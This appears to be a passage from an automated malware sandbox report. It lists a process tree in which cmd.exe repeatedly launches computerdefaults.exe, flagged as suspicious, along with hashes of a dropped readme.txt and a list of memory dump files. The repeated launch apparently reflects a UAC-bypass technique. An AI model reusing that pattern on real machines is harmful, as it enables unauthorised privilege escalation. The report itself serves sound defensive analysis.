- Suspicious use of WriteProcessMemory
PID:3704
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4360

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2472
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4048

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:1988
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3856

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\readme.txt

MD5
60e94abdaaadd1b2add3a0237e35b2da

SHA1
f02e17f57beb3357deab192c69c2a425ae85d6b6

SHA256
59ca84c42bd64b9463e5eb669245b7e45e72f671f47a54508d588987681301e5

SHA512
40848709ef7a435d0b21a313979c25055b3f3c24f6ff5296aca00a9b8cb4545a97c98d10005f08b232336df5d27383216290cc7c72a10d400d6a4809d9b82809

Download Submit
memory/428-151-0x0000000000000000-mapping.dmp

Download
memory/504-152-0x0000000000000000-mapping.dmp

Download
memory/648-133-0x0000000000000000-mapping.dmp

Download
memory/852-134-0x0000000000000000-mapping.dmp

Download
memory/1524-135-0x0000000000000000-mapping.dmp

Download
memory/1548-162-0x0000000000000000-mapping.dmp

Download
memory/1800-128-0x0000000000000000-mapping.dmp

Download
memory/2144-136-0x0000000000000000-mapping.dmp

Download
memory/2312-127-0x000001733FFE0000-0x000001733FFE4000-memory.dmp

Filesize
16KB

Download
memory/2364-147-0x0000000000000000-mapping.dmp

Download
memory/2756-153-0x0000000000000000-mapping.dmp

Download
memory/2772-137-0x0000000000000000-mapping.dmp

Download
memory/2816-138-0x0000000000000000-mapping.dmp

Download
memory/2852-139-0x0000000000000000-mapping.dmp

Download
memory/2928-160-0x0000000000000000-mapping.dmp

Download
memory/2992-140-0x0000000000000000-mapping.dmp

Download
memory/3084-159-0x0000000000000000-mapping.dmp

Download
memory/3160-154-0x0000000000000000-mapping.dmp

Download
memory/3476-161-0x0000000000000000-mapping.dmp

Download
memory/3580-149-0x0000000000000000-mapping.dmp

Download
memory/3828-117-0x000002AC16960000-0x000002AC16961000-memory.dmp

Filesize
4KB

Download
memory/3828-121-0x000002AC18860000-0x000002AC18861000-memory.dmp

Filesize
4KB

Download
memory/3828-126-0x000002AC188D0000-0x000002AC188D1000-memory.dmp

Filesize
4KB

Download
memory/3828-123-0x000002AC188A0000-0x000002AC188A1000-memory.dmp

Filesize
4KB

Download
memory/3828-124-0x000002AC188B0000-0x000002AC188B1000-memory.dmp

Filesize
4KB

Download
memory/3828-115-0x000002AC16800000-0x000002AC16806000-memory.dmp

Filesize
24KB

Download
memory/3828-122-0x000002AC18870000-0x000002AC18871000-memory.dmp

Filesize
4KB

Download
memory/3828-119-0x000002AC18220000-0x000002AC18221000-memory.dmp

Filesize
4KB

Download
memory/3828-118-0x000002AC18210000-0x000002AC18211000-memory.dmp

Filesize
4KB

Download
memory/3828-155-0x000002AC18EF0000-0x000002AC18EF1000-memory.dmp

Filesize
4KB

Download
memory/3828-125-0x000002AC188C0000-0x000002AC188C1000-memory.dmp

Filesize
4KB

Download
memory/3828-116-0x000002AC16950000-0x000002AC16951000-memory.dmp

Filesize
4KB

Download
memory/3828-120-0x000002AC18850000-0x000002AC18851000-memory.dmp

Filesize
4KB

Download
memory/3856-167-0x0000000000000000-mapping.dmp

Download
memory/4048-157-0x0000000000000000-mapping.dmp

Download
memory/4112-142-0x0000000000000000-mapping.dmp

Download
memory/4212-146-0x0000000000000000-mapping.dmp

Download
memory/4216-145-0x0000000000000000-mapping.dmp

Download
memory/4260-141-0x0000000000000000-mapping.dmp

Download
memory/4360-158-0x0000000000000000-mapping.dmp

Download
memory/4428-163-0x0000000000000000-mapping.dmp

Download
memory/4488-166-0x0000000000000000-mapping.dmp

Download
memory/4520-164-0x0000000000000000-mapping.dmp

Download
memory/4524-130-0x0000000000000000-mapping.dmp

Download
memory/4556-132-0x0000000000000000-mapping.dmp

Download
memory/4580-131-0x0000000000000000-mapping.dmp

Download
memory/4584-165-0x0000000000000000-mapping.dmp

Download
memory/4664-148-0x0000000000000000-mapping.dmp

Download
memory/4872-143-0x0000000000000000-mapping.dmp

Download
memory/4956-150-0x0000000000000000-mapping.dmp

Download
memory/5036-144-0x0000000000000000-mapping.dmp

Download
memory/5088-156-0x0000000000000000-mapping.dmp

Download